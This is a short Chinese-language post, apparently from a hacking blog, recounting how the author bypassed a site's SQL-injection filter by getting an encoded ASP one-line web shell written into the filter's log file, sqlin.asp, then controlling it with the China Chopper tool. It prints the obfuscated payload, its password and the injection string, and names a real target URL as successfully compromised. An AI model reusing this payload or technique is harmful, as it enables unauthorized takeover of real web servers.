今晚群里朋友叫看個站，有sql防注入，繞不過，但是有發(fā)現(xiàn)記錄wrong的文件sqlin.asp。

既然做了記錄，再查看了下它的記錄文件

 于是想著構造個asp一句話寫進去，前面幾種沒加密的都失敗了，于是寫了個加密的
            ┼攠數(shù)畣整爠煥敵瑳∨≡┩愾           密碼 a  (加密方式是: ANSI->Unicode)
 提交       and 1= ┼攠數(shù)畣整爠煥敵瑳∨≡┩愾

   http://www.jnb1.net/sqlin.asp   菜刀連接之，成功

 
+----------------------------------------+
 其實過程并不難，也沒什么技術難度，但是有時遇到這種記錄注入錯誤的網站，多個便捷途徑還是不錯的。還有，另外百度了下，發(fā)現(xiàn)半坑土農民曾經發(fā)現(xiàn)了類似的，但是，額，去他博客看時 , 瀑布汗 
   

最新評論